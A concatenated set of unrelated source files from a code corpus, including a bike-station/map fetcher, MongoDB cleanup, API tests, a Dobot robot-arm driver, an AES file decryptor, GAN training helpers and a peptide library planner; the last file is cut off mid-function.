+{"seq_id":"80646245","text":"#!/usr/bin/python2\n\nimport os\nimport sys\nfrom mapbox import Static\nimport json\nimport requests\n\nMAPBOX_TOKEN = \"pk.XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\nJCDECAUX_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n\n\ndef get_stations():\n # Doc: https://developer.jcdecaux.com/#/opendata/vls?page=getstarted\n url = \"https://developer.jcdecaux.com/rest/vls/stations/Toulouse.json\"\n data = json.loads(requests.get(url=url).text)\n \n return data\n\n\ndef save_map():\n # Doc: https://github.com/mapbox/mapbox-sdk-py/blob/master/docs/static.md#static-maps\n service = Static(access_token=MAPBOX_TOKEN)\n \n response = service.image('mapbox.satellite', lon=-61.7, lat=12.1, z=12)\n with open('/tmp/map.png', 'wb') as output:\n output.write(response.content)\n\n\ndef main():\n data = get_stations()\n print(data)\n \n save_map()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"41110226","text":"# -*- coding:utf-8 -*-\n\nimport common.mongodb.mongodb as mongodb\nimport common.util.date as date\nfrom common.util.progress import ProgressBar\nfrom common.util.utils import *\n\n\ndb = mongodb.Client.getDB()\n\n\ndef cleanUnits():\n units = db.unit.find({'commonProperty.unitCommonForVisitor.cityInfo': {'$exists': False}})\n\n bar = ProgressBar(total=units.count())\n\n for unit in units:\n # print unit\n try:\n communityId = unit['commonProperty']['unitCommonForVisitor']['communityId']\n except BaseException:\n continue\n\n dbCommunity = db.community.find_one({\"id\": communityId})\n if dbCommunity:\n # print dbCommunity\n cityInfo = dbCommunity.get('cityInfo')\n if cityInfo:\n db.unit.update({\"_id\": unit.get('_id')}, {\"$set\": {\"commonProperty.unitCommonForVisitor.cityInfo\": cityInfo}})\n else:\n bar.log(\"can not found community-cityInfo communityId=%s\" % communityId)\n else:\n bar.log(\"can not found community communityId=%s\" % communityId)\n\n bar.move()\n bar.log()\n\n\ndef main(quiet = False):\n runTips(lambda: cleanUnits(), '深圳房源添加城市信息', quiet)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/data_cleaner/transfer/v1_2/n6_add_city_for_unit_sz.py","file_name":"n6_add_city_for_unit_sz.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"20845674","text":"from aiohttp.test_utils import unittest_run_loop\n\nfrom tests.functional.sa.core.base import BaseTestCase\n\n\nclass ViewsTestCase(BaseTestCase):\n @unittest_run_loop\n async def test_list_view(self) -> None:\n response = await self.client.get(\"/users\")\n self.assertEqual(response.status, 200)\n data = await response.json()\n self.assertTrue(data)\n user = data[0]\n self.assertTrue(user[\"id\"])\n self.assertIsNone(user.get(\"password\"))\n\n @unittest_run_loop\n async def test_retrieve_view(self) -> None:\n response = await self.client.get(f\"/users/{self.user['id']}\")\n self.assertEqual(response.status, 200)\n data = await response.json()\n self.assertTrue(data)\n self.assertEqual(str(self.user[\"id\"]), data[\"id\"])\n\n @unittest_run_loop\n async def test_create_view(self):\n response = await self.client.post(\"/users\", json=self.get_test_user_data())\n assert response.status == 201, \"invalid response status code\"\n\n data = await response.json()\n self.assertTrue(data)\n self.assertIn(\"id\", data)\n\n user = await self.get_last_created_user()\n self.assertEqual(str(user[\"id\"]), data[\"id\"])\n self.assertEqual(user[\"name\"], data[\"name\"])\n self.assertEqual(user[\"phone\"], data[\"phone\"])\n self.assertEqual(user[\"email\"], data[\"email\"])\n\n @unittest_run_loop\n async def test_update_view(self):\n user_data = {\n \"id\": str(self.user.id), # serialize uuid\n \"created_at\": str(self.user.created_at), # serialize datetime,\n \"name\": \"Updated Name\",\n \"email\": \"updated@mail.com\",\n \"phone\": \"+7346352401\",\n }\n response = await self.client.put(f\"/users/{self.user.id}\", json=user_data)\n assert response.status == 200, \"invalid response\"\n\n response_data = await response.json()\n updated_user = await self.get_user_by_id(self.user.id)\n self.assertEqual(response_data[\"id\"], user_data[\"id\"])\n self.assertEqual(response_data[\"name\"], user_data[\"name\"])\n self.assertEqual(response_data[\"name\"], updated_user[\"name\"])\n self.assertEqual(response_data[\"email\"], user_data[\"email\"])\n self.assertEqual(response_data[\"email\"], updated_user[\"email\"])\n self.assertEqual(response_data[\"phone\"], user_data[\"phone\"])\n self.assertEqual(response_data[\"phone\"], updated_user[\"phone\"])\n\n @unittest_run_loop\n async def test_create_with_null_value_that_must_not_be_null(self):\n test_user_data = self.get_test_user_data()\n test_user_data.pop(\"password\")\n response = await self.client.post(\"/users\", json=test_user_data)\n self.assertEqual(response.status, 400)\n data = await response.json()\n self.assertTrue(\"password\" in data[\"error\"] and \"null\" in data[\"error\"])\n\n @unittest_run_loop\n async def test_invalid_json(self):\n user_data = '{\"name\": \"My Name\", \"email\": \"test@email.com\", \"phone\": \"123\",}'\n response = await self.client.post(\"/users\", data=user_data, headers={\"Content-Type\": \"application/json\"})\n self.assertEqual(response.status, 400)\n data = await response.json()\n self.assertEqual(data[\"error\"], \"invalid json\")\n\n @unittest_run_loop\n async def test_partial_update_view(self):\n user_data = {\n \"email\": \"updated@mail.com\",\n }\n response = await self.client.patch(f\"/users/{self.user['id']}\", json=user_data)\n assert response.status == 200, \"invalid response\"\n\n response_data = await response.json()\n updated_user = await self.get_user_by_id(self.user[\"id\"])\n self.assertEqual(response_data[\"email\"], user_data[\"email\"])\n self.assertEqual(response_data[\"email\"], updated_user[\"email\"])\n self.assertNotEqual(updated_user[\"email\"], self.user[\"email\"])\n self.assertEqual(response_data[\"name\"], self.user[\"name\"])\n\n @unittest_run_loop\n async def test_update_non_existent_user(self):\n response = await self.client.put(\"/users/123\", json={})\n self.assertEqual(response.status, 404)\n\n @unittest_run_loop\n async def test_destroy_view(self):\n response = await self.client.delete(f\"/users/{self.user['id']}\")\n assert response.status == 204, \"invalid response\"\n\n user = await self.get_user_by_id(self.user[\"id\"])\n self.assertIsNone(user)\n\n @unittest_run_loop\n async def test_destroy_non_existent_user(self):\n response = await self.client.delete(\"/users/123\")\n self.assertEqual(response.status, 404)\n","sub_path":"tests/functional/sa/core/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104386086","text":"from app.alunos.controllers import AlunosCreate\nfrom flask import Blueprint\nfrom app.alunos.controllers import AlunosCreate, AlunosDetails\n\naluno_api = Blueprint('aluno_api',__name__)\n\naluno_api.add_url_rule(\n '/aluno/create', view_func= AlunosCreate.as_view('aluno_create'), methods=['GET', 'POST']\n)\n\naluno_api.add_url_rule(\n '/aluno/details/', view_func= AlunosDetails.as_view('aluno_details'), methods=['GET', 'PUT', 'PATCH', 'DELETE']\n)","sub_path":"app/alunos/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"134117203","text":"import struct\nimport threading\nimport time\n\nimport serial\n\nfrom pydobot.message import Message\n\n\ndef retry(f):\n def dec(*a, **kw):\n while True:\n try:\n return f(*a, **kw)\n except:\n time.sleep(0.05)\n return dec\n\n\nMODE_PTP_JUMP_XYZ = 0x00\nMODE_PTP_MOVJ_XYZ = 0x01\nMODE_PTP_MOVL_XYZ = 0x02\nMODE_PTP_JUMP_ANGLE = 0x03\nMODE_PTP_MOVJ_ANGLE = 0x04\nMODE_PTP_MOVL_ANGLE = 0x05\nMODE_PTP_MOVJ_INC = 0x06\nMODE_PTP_MOVL_INC = 0x07\nMODE_PTP_MOVJ_XYZ_INC = 0x08\nMODE_PTP_JUMP_MOVL_XYZ = 0x09\n\nGET_POSE = 10\nSET_HOME_CMD = 31\nSET_END_EFFECTOR_PARAMS = 60\nSET_END_EFFECTOR_SUCTION_CUP = 62\nSET_PTP_COORDINATE_PARAMS = 81\nSET_PTP_COMMON_PARAMS = 83\nSET_PTP_CMD = 84\nSET_CP_CMD = 91\nGET_QUEUED_CMD_CURRENT_INDEX = 246\n\n\nclass Dobot(threading.Thread):\n on = True\n x = 0.0\n y = 0.0\n z = 0.0\n r = 0.0\n j1 = 0.0\n j2 = 0.0\n j3 = 0.0\n j4 = 0.0\n\n # joint_angles = [4]\n\n def __init__(self, port, verbose=False):\n threading.Thread.__init__(self)\n self.verbose = verbose\n self.lock = threading.Lock()\n self.ser = serial.Serial(port,\n baudrate=115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS)\n self.closed = threading.Event()\n is_open = self.ser.isOpen()\n if self.verbose:\n print('pydobot: %s open' % self.ser.name if is_open else 'failed to open serial port')\n self._set_ptp_coordinate_params(velocity=200.0, acceleration=200.0)\n self._set_ptp_common_params(velocity=200.0, acceleration=200.0)\n self._get_pose()\n self.start()\n\n def run(self):\n while self.on:\n try:\n self._get_pose()\n except AttributeError:\n pass # Don't die on attribute errors in this thread since they should be transient\n time.sleep(0.2)\n self.lock.acquire()\n self.ser.close()\n if self.verbose:\n print('pydobot: %s closed' % self.ser.name)\n self.lock.release()\n self.closed.set()\n\n def close(self):\n self.on = False\n self.closed.wait(1)\n\n def wait_for_queue_to_drain(self):\n while self._get_queued_cmd_current_index() < self.queue_pos:\n time.sleep(0.1)\n\n def _send_command(self, msg, sync=False):\n with self.lock:\n self._send_message(msg)\n response = self._read_message()\n # for some reason HOME returns nothing contrary to documentation, so it's always considered async\n if msg.queued and msg.id != SET_HOME_CMD:\n self.queue_pos = struct.unpack(\"L\", response.params[-8:])[0]\n if sync:\n self.wait_for_queue_to_drain()\n return response\n\n def _send_message(self, msg):\n time.sleep(0.1)\n if self.verbose:\n print('pydobot: >>', msg)\n self.ser.write(msg.bytes())\n\n def _read_message(self):\n time.sleep(0.1)\n b = self.ser.read_all()\n if len(b) > 0:\n msg = Message(b)\n if self.verbose:\n print('pydobot: <<', msg)\n return msg\n return\n\n def _get_pose(self):\n msg = Message()\n msg.id = GET_POSE\n response = self._send_command(msg)\n self.x = struct.unpack_from('f', response.params, 0)[0]\n self.y = struct.unpack_from('f', response.params, 4)[0]\n self.z = struct.unpack_from('f', response.params, 8)[0]\n self.r = struct.unpack_from('f', response.params, 12)[0]\n self.j1 = struct.unpack_from('f', response.params, 16)[0]\n self.j2 = struct.unpack_from('f', response.params, 20)[0]\n self.j3 = struct.unpack_from('f', response.params, 24)[0]\n self.j4 = struct.unpack_from('f', response.params, 28)[0]\n if self.verbose:\n print(\"pydobot: x:%03.1f y:%03.1f z:%03.1f r:%03.1f j1:%03.1f j2:%03.1f j3:%03.1f j4:%03.1f\" %\n (self.x, self.y, self.z, self.r, self.j1, self.j2, self.j3, self.j4))\n return response\n\n def _set_cp_cmd(self, x, y, z):\n msg = Message()\n msg.id = SET_CP_CMD\n msg.ctrl = 0x03\n msg.params = bytearray(bytes([0x01]))\n msg.params.extend(bytearray(struct.pack('f', x)))\n msg.params.extend(bytearray(struct.pack('f', y)))\n msg.params.extend(bytearray(struct.pack('f', z)))\n msg.params.append(0x00)\n return self._send_command(msg)\n\n def _set_ptp_coordinate_params(self, velocity, acceleration):\n msg = Message()\n msg.id = SET_PTP_COORDINATE_PARAMS\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n return self._send_command(msg)\n\n def _set_ptp_common_params(self, velocity, acceleration):\n msg = Message()\n msg.id = SET_PTP_COMMON_PARAMS\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray(struct.pack('f', velocity)))\n msg.params.extend(bytearray(struct.pack('f', acceleration)))\n return self._send_command(msg)\n\n def _set_ptp_cmd(self, x, y, z, r, mode, sync):\n msg = Message()\n msg.id = SET_PTP_CMD\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray([mode]))\n msg.params.extend(bytearray(struct.pack('f', x)))\n msg.params.extend(bytearray(struct.pack('f', y)))\n msg.params.extend(bytearray(struct.pack('f', z)))\n msg.params.extend(bytearray(struct.pack('f', r)))\n response = self._send_command(msg, sync=sync)\n return response\n\n def _set_end_effector_suction_cup(self, suck=False):\n msg = Message()\n msg.id = SET_END_EFFECTOR_SUCTION_CUP\n msg.ctrl = 0x03\n msg.params = bytearray([])\n msg.params.extend(bytearray([0x01]))\n if suck is True:\n msg.params.extend(bytearray([0x01]))\n else:\n msg.params.extend(bytearray([0x00]))\n return self._send_command(msg)\n\n def _set_home_cmd(self):\n msg = Message()\n msg.id = SET_HOME_CMD\n msg.ctrl = 0x03\n msg.params = bytearray([])\n self._send_command(msg, sync=False)\n\n def _set_end_effector_params(self, x, y, z):\n msg = Message()\n msg.id = SET_END_EFFECTOR_PARAMS\n msg.ctrl = 0x02\n msg.params = bytearray([])\n msg.params.extend(struct.pack('f', x))\n msg.params.extend(struct.pack('f', y))\n msg.params.extend(struct.pack('f', z))\n return self._send_command(msg)\n\n\n @retry\n def _get_queued_cmd_current_index(self):\n msg = Message()\n msg.id = GET_QUEUED_CMD_CURRENT_INDEX\n response = self._send_command(msg)\n # sometimes (when a command is running?) the returned struct has more than the index, but the index seems to\n # always be the last 8 bytes\n return struct.unpack(\"L\", response.params[-8:])[0]\n\n def home(self):\n self._set_home_cmd()\n\n def go(self, x=None, y=None, z=None, r=None, dx=None, dy=None, dz=None, dr=None, sync=True):\n assert not (x and dx) and not (y and dy) and not (z and dz) and not (r and dr), \"in any dimension, do not provide both absolute and relative values\"\n def update(old, abs, rel):\n if abs is not None:\n return abs\n elif rel is not None:\n return old + rel\n else:\n return old\n x = update(self.x, x, dx)\n y = update(self.y, y, dy)\n z = update(self.z, z, dz)\n r = update(self.r, r, dr)\n self._set_ptp_cmd(x, y, z, r, mode=MODE_PTP_MOVJ_XYZ, sync=sync)\n\n def set_end_effector_bias(self, x=0, y=0, z=0):\n self._set_end_effector_params(x, y, z)\n\n def suck(self, suck):\n self._set_end_effector_suction_cup(suck)\n\n def speed(self, velocity=100., acceleration=100.):\n self._set_ptp_common_params(velocity, acceleration)\n self._set_ptp_coordinate_params(velocity, acceleration)\n\n # def set_operating_bounds(self, xmin=None, xmax=None, ymin=None, ymax=None, zmin=None, zmax=None, rmin=None, rmax=None):\n # assert xmin < xmax, (xmin, xmax)\n # assert ymin < ymax, (ymin, ymax)\n # assert zmin < zmax, (zmin, zmax)\n # assert rmin < rmax, (rmin, rmax)\n\n ","sub_path":"pydobot/dobot.py","file_name":"dobot.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308475725","text":"from Crypto.Cipher import AES\r\nfrom Crypto import Random\r\n\r\nimport os, sys\r\n\r\ndef decrypt_it(bytefile, key, iv):\r\n\tcfb_decipher = AES.new(key, AES.MODE_CFB, iv)\r\n\treturn cfb_decipher.decrypt(bytefile)\r\n\r\ndef readBinFile(dir):\r\n\tfile = open(dir, \"rb\")\r\n\tdata = file.read()\r\n\tfile.close()\r\n\treturn data\r\n\r\ndef writeBinFile(dir, data):\r\n\tfile = open(dir, \"wb\")\r\n\tfile.write(data)\r\n\tfile.close()\r\n\r\ndef safe_os(cmd):\r\n\ttry:\r\n\t\tos.system(cmd)\r\n\texcept:\r\n\t\tpass\r\n\r\nprint (\"The program allows you to decrypt files\")\r\nprint (\"Please put the key file you have received from the sender in the current directory\")\r\ntemp = input (\"Press \\'Enter\\' key to continue...\\n\")\r\n\r\ntry:\r\n\tplain_key = readBinFile(\"KEYIV.key\")\r\nexcept:\r\n\traise Exception('KEYIV.key does not exist in the current directory')\r\n\r\n#Retrieving KEY and IV used for decryption\r\nprint (\"Retrieving KEYIV\")\r\n\r\ntry:\r\n\tkeyiv = open(\"KEYIV.key\", 'r')\r\n\tki = keyiv.readlines()\r\n\tkeyiv.close()\r\nexcept:\r\n\traise Exception('KEYIV.key does not exist in the current directory')\r\n\r\nprint (\"Retrieving completed\\n\")\r\n\r\nexec(\"key = \"+ ki[0][6:-2])\r\nexec(\"iv = \" + ki[1][5:-2])\r\n\r\nsafe_os('mkdir 1ENCRYPTED')\r\nsafe_os('mkdir 2DECRYPTED')\r\n\r\nprint (\"Please put the files you want to decrypt in \\'1ENCRYPTED\\'\")\r\ntemp = input (\"Press \\'Enter\\' key to continue...\")\r\n\r\n#Begin decryption\r\nprint (\"Retrieving files in 1ENCRYPTED\")\r\ntry:\r\n\tinFiles = os.listdir(\"1ENCRYPTED\")\r\nexcept:\r\n\traise Exception('Directory \\'1ENCRYPTED\\' does not exist in the current directory')\r\n\r\nprint (\"Beginning Decryption...\\n\")\r\n\r\nfor file in inFiles:\r\n\tprint (\"Decrypting\", file)\r\n\r\n\tfiledata = readBinFile(\"1ENCRYPTED/\"+file)\r\n\twriteBinFile(\"2DECRYPTED/\"+file[:-4], decrypt_it(filedata, key, iv))\r\n\r\n\tprint (\"Completed decrypting\", file, \"\\n\")\r\n\r\nprint (\"Decryption Completed\\n\")\r\n","sub_path":"DECRYPT_IT/FINAL_DECRYPT_IT_00.py","file_name":"FINAL_DECRYPT_IT_00.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"292322304","text":"import os\nimport numpy as np\nfrom keras.utils import generic_utils\nfrom keras.utils import np_utils\n\nfrom config import *\nfrom models_stat import *\n\ndef increase_lr(n,n_max,lr,inc):\n if n < n_max:\n K.set_value(lr, K.get_value(lr) +inc)\n return lr\n \ndef increase_lr2(n,n_max,lr,inc):\n if n < n_max + 4 and n > 4:\n K.set_value(lr, K.get_value(lr) +inc)\n return lr\n\ndef make_trainable(net, val):\n net.trainable = val\n for l in net.layers:\n l.trainable = val\n\"\"\"\ndef make_noise_sample(scale):\n noise_sample = scale * np.random.randn(BS, noise_dim)\n return noise_sample\n\"\"\"\n\ndef make_batch_for_dis(X_train, y_train, encoder, decoder,num_classes):\n idx = np.random.choice(np.arange(X_train.shape[0]), BS*n_feat_maps, replace=False)\n X_sample = X_train[idx]\n y_sample = y_train[idx]\n \n idx = np.random.choice(np.arange(X_train.shape[0]),BS*n_feat_maps, replace=False)\n train_img = X_train[idx] \n train_img = encoder.predict(train_img)\n\n if noise_dim == 0:\n #print(train_img.shape)\n decode_img = decoder.predict(train_img)\n else:\n noise_sample = make_noise_sample(noise_scale, BS)\n decode_img = decoder.predict([train_img, noise_sample])\n\n X_sample = np.concatenate((X_sample, decode_img),axis = 0)\n \n y = np.array(BS*n_feat_maps*[num_classes-1])\n y = np_utils.to_categorical(y) \n y_sample = np.concatenate((y_sample,y)) \n \n return X_sample, y_sample\n \ndef make_batch_for_dis_noise(X_train, y_train, encoder, decoder,num_classes): \n idx = np.random.choice(np.arange(X_train.shape[0]),BS, replace=False)\n train_img = X_train[idx] \n train_img = encoder.predict(train_img)\n\n noise_sample = make_noise_sample(noise_scale, BS)\n decode_img = decoder.predict([train_img, noise_sample])\n \n return decode_img, noise_sample \n\n \ndef make_batch_for_gan(X_train, y_train,stat_samples,encoder, num_classes):\n \n \n \n \n if pearson_loss:\n #chose random samples with the same temperature\n temp = np.random.randint(num_classes-1)\n idx = np.random.choice(np.arange(stat_samples[temp].shape[0]), 1, replace=False)\n idx = list(idx) * BS\n real_samples = stat_samples[temp][idx]\n \n \n #target values for temperature discriminator\n y_temp = np_utils.to_categorical([temp]*BS*n_feat_maps, num_classes = num_classes)\n y_temp = np.reshape(y_temp, (1,BS*n_feat_maps, num_classes)) \n \n else:\n #chose random samples with random temperature\n idx = np.random.choice(np.arange(X_train.shape[0]), BS, replace=False)\n real_samples = X_train[idx]\n \n #y_temp = y_train[idx] \n #y_temp = np.reshape(y_temp, (1,BS, num_classes)) \n \n y_temp = np.repeat(y_train[[idx[0]],:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_temp = np.concatenate((y_temp,np.repeat(y_train[[idx[n]],:], n_feat_maps, axis = 0)), axis = 0)\n y_temp = np.reshape(y_temp, (1,BS*n_feat_maps,num_classes))\n\n \n enc_samples = encoder.predict(real_samples)\n \n X_sample = [np.reshape(enc_samples, (1,BS,3,20,20))]\n \n if noise_dim != 0:\n noise_sample = noise_scale * np.random.randn(1,BS, noise_dim)\n X_sample.append(noise_sample)\n\n if spec_h_loss:\n #batch of temperature values for the statistic learning\n temps = np.array([[temp_list[temp]]*(BS*n_feat_maps)])\n X_sample.append(temps)\n\n\n\n y_sample = [y_temp]\n\n\n\n #target values for reconstruction error\n if recon:\n y_recon = np.repeat(enc_samples[[0],:,:,:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_recon = np.concatenate((y_recon,np.repeat(enc_samples[[n],:,:,:], n_feat_maps, axis = 0)), axis = 0)\n y_recon = np.reshape(y_recon, (1,BS*n_feat_maps,3,20,20))\n y_sample.append(y_recon)\n if pearson_loss: \n y_sample.append(np.array([[0.0]]))\n \n if noise_dis:\n noise_sample = noise_sample[0,:,:]\n y_noise = np.repeat(noise_sample[[0],:], n_feat_maps, axis = 0)\n for n in range(1,BS): \n y_noise = np.concatenate((y_noise,np.repeat(noise_sample[[n],:], n_feat_maps, axis = 0)), axis = 0)\n y_noise = np.reshape(y_noise, (1,BS*n_feat_maps,noise_dim)) \n y_sample.append(y_noise)\n\n\n return X_sample, y_sample\n #return X_sample, [y_temp,y_recon, np.reshape(stat_list[0][temp], (1,64)), np.reshape(stat_list[6][temp], (1,1)), np.reshape(stat_list[2][temp], (1,1)), np.reshape(stat_list[3][temp], (1,1)), np.reshape(stat_list[4][temp], (1,1))]\n\n\ndef pre_training(X_train, Y_train,encoder, decoder, dis_temp,num_classes,steps = 10):\n progbar = generic_utils.Progbar(steps*BS)\n for n in range(0,steps): \n X_sample, y_sample = make_batch_for_dis(X_train, Y_train ,encoder, decoder,num_classes) \n \n #unfreeze the weights of the discriminator\n make_trainable(dis_temp,True) \n #train the discriminator\n dt_loss = dis_temp.train_on_batch(X_sample, y_sample)\n \n progbar.add(BS, values=[(\"Loss_D\", dt_loss[0]),\n (\"Acc_D\", dt_loss[1])]) \n \n \t\t\ndef training(losses,X_train, Y_train,stat_samples, encoder, decoder, dis_temp,dis_noise, dis,gan,num_classes,nb_epoch=5000):\n #display the progess of the learning process \n progbar = generic_utils.Progbar(nb_epoch*BS)\n for e in range(0,nb_epoch):\n #for e in tqdm(range(nb_epoch)): \n\n X_sample, y_sample = make_batch_for_dis(X_train, Y_train,encoder, decoder,num_classes)\n #make_trainable(dis,True) \n make_trainable(dis_temp,True) \n dt_loss = dis_temp.train_on_batch(X_sample,y_sample)\n losses[\"dt\"].append(dt_loss)\n\n if noise_dis:\n X_sample, y_sample = make_batch_for_dis_noise(X_train, Y_train,encoder, decoder,num_classes)\n \n make_trainable(dis_noise,True) \n make_trainable(dis,True) \n dn_loss = dis_noise.train_on_batch(X_sample,y_sample)\n losses[\"dn\"].append(dn_loss) \n make_trainable(dis_noise,False) \n make_trainable(dis,False) \n\n \n #####################################################\n \n X_sample, y_target_list = make_batch_for_gan(X_train, Y_train,stat_samples,encoder, num_classes)\n \n make_trainable(dis_temp,False)\n g_loss = gan.train_on_batch(X_sample,y_target_list)\n #g_loss = [0]\n losses[\"g\"].append(g_loss)\n\n prog_list = [(\"DT\", dt_loss[0]), (\"Acc\", dt_loss[1])]\n \n if noise_dis:\n prog_list.append((\"DN\", dn_loss[0]))\n prog_list.append((\"A\", dn_loss[1]))\n\n\n prog_list.append((\"G\", g_loss[0])) \n for n in range(1,len(g_loss)):\n prog_list.append((str(n), g_loss[n])) \n \n progbar.add(BS, values= prog_list)\n\n return losses\n \n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"234526933","text":"def error_handler():\n try:\n name = int('1232a') # ValueError\n lastname = ['yilmaz', 'keskin'][3] # IndexError\n other_dict = {\"name\":\"merve\", \"lastname\": \"demir\"}\n other_name = other_dict['other_name'] # KeyError\n age = 1/0 # ZeroDivisionError\n print('OK!')\n except (ValueError, IndexError, KeyError, ZeroDivisionError) as e:\n print(e)\n\nerror_handler()\n\n# Alperen Çubuk\n","sub_path":"answer6.py","file_name":"answer6.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"439001171","text":"###\n#AUTHOR: Nathaniel Watson\n###\n\ndef dnaRevComp(x):\n\t\"\"\"\n\tFunction : Returns the reverse complement of a string consisting of the letters A,C,G,T,N.\n\tArgs : x - str.\n\tReturns : str.\n Example: Given that x is ACCTG, returns CAGGT\n\t\"\"\"\n\tfrom string import maketrans\n\tx = x[::-1]\n\tstart=\"ACGTN\"\n\tend = \"TGCAN\"\n\ttranstab = maketrans(start,end)\n\treturn x.translate(transtab)\n\n","sub_path":"nucleic.py","file_name":"nucleic.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"16879485","text":"from loader import dp\nfrom aiogram.types import Message\nfrom services.service import get_formatted_categories, get_formatted_types\n\n\n@dp.message_handler(commands=['categories'])\nasync def categories_list(message: Message):\n answer_message = get_formatted_categories()\n await message.answer(answer_message)\n\n\n@dp.message_handler(commands=['types'])\nasync def types_list(message: Message):\n answer_message = get_formatted_types()\n await message.answer(answer_message)\n","sub_path":"handlers/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631244560","text":"import os\nfrom abc import ABC, abstractmethod\nfrom copy import deepcopy\nfrom random import choice, choices, sample\nimport json\nimport glob\n\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\n\nimport macrocycles.config as config\nimport macrocycles.project_io as project_io\nimport macrocycles.utils as utils\n\n\nclass IPlanner(ABC):\n\n @abstractmethod\n def create_plan(self):\n pass\n\n\nclass PeptidePublicationPlanner(IPlanner):\n\n MAX_MW = config.MAX_MW - 258 # 258 is average of template MW\n\n def __init__(self, peptide_length, num_peptides):\n self.monomers = project_io.get_filtered_monomer_set()\n if not isinstance(self.monomers, list):\n self.monomers = list(self.monomers)\n self.c_cap_monomers = self.get_c_cap_monomers()\n self.saver = project_io.PeptidePlannerIO(peptide_length)\n self.peptide_length = peptide_length\n self.num_peptides = num_peptides\n self.monomer_combinations = set()\n\n def create_plan(self):\n\n if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, self.peptide_length)):\n self.validate_num_peptides()\n self.create_minimum_list()\n self.create_remaining_list()\n self.saver.save(self.monomer_combinations)\n\n def create_minimum_list(self):\n\n for position in range(self.peptide_length):\n for desired_monomer in self.monomers:\n for fillers in self.get_fillers(desired_monomer):\n self.monomer_combinations.add(\n tuple(fillers[0:position] + [desired_monomer['index']] + fillers[position:]))\n\n def create_remaining_list(self):\n monomers = [deepcopy(self.monomers) for _ in range(self.peptide_length)]\n while True:\n for random_sample in utils.random_sample_cartesian_product(*monomers, sample_size=self.num_peptides * 5):\n if len(self.monomer_combinations) > self.num_peptides:\n break\n if self.validate_monomers(random_sample):\n # if len(self.monomer_combinations) % 1000 == 0:\n # print(len(self.monomer_combinations))\n self.monomer_combinations.add(tuple(monomer['index'] for monomer in random_sample))\n if self.c_cap_eligible(random_sample):\n random_sample += [choice(self.c_cap_monomers)]\n self.monomer_combinations.add(tuple(monomer['index'] for monomer in random_sample))\n else:\n continue\n break\n\n def get_fillers(self, desired_monomer):\n\n while True:\n monomers = list(choices(self.monomers, k=self.peptide_length - 1))\n monomers.append(desired_monomer)\n if self.validate_monomers(monomers):\n yield [monomer['index'] for monomer in monomers[:-1]]\n if self.c_cap_eligible(monomers):\n c_cap = choice(self.c_cap_monomers)\n yield [monomer['index'] for monomer in monomers[:-1]] + [c_cap['index']]\n break\n\n def get_c_cap_monomers(self):\n\n return list(filter(lambda x: x['backbone'] == 'alpha' and x['connection'] == 'methyl' and x['required'], self.monomers))\n\n def validate_monomers(self, monomers):\n\n mw = sum(map(AllChem.CalcExactMolWt, map(lambda x: Chem.Mol(x['binary']), monomers)))\n if mw > PeptidePublicationPlanner.MAX_MW:\n return False\n\n if self.peptide_length < 5 and 3 > len(list(filter(lambda x: x['required'], monomers))):\n return True\n\n if self.peptide_length == 5 and 4 > len(list(filter(lambda x: x['required'], monomers))) > 0:\n return True\n\n return False\n\n def c_cap_eligible(self, monomers):\n\n if self.peptide_length < 5 and 2 > len(list(filter(lambda x: x['required'], monomers))):\n return True\n\n return False\n\n def validate_num_peptides(self):\n\n if self.num_peptides < len(self.monomers) * self.peptide_length:\n raise ValueError('The requested number of peptides needs to be at least as large as the number of monomers'\n ' times the peptide length')\n\n\n# class ConformerPublicationPlanner(IPlanner):\n\n# def __init__(self, peptide_length, num_conformers, num_macrocycles):\n# if num_macrocycles is None:\n# self.macrocycle_loader = project_io.get_macrocycle_io(peptide_length=peptide_length, job_num=None)\n# else:\n# self.macrocycle_loader = None\n# self.num_macrocycles = num_macrocycles\n# self.saver = project_io.ConformerPlannerIO(peptide_length)\n# self.peptide_length = peptide_length\n# self.num_conformers = num_conformers\n\n# def create_plan(self):\n\n# if not os.path.exists(utils.attach_file_num(self.saver.FILEPATH, 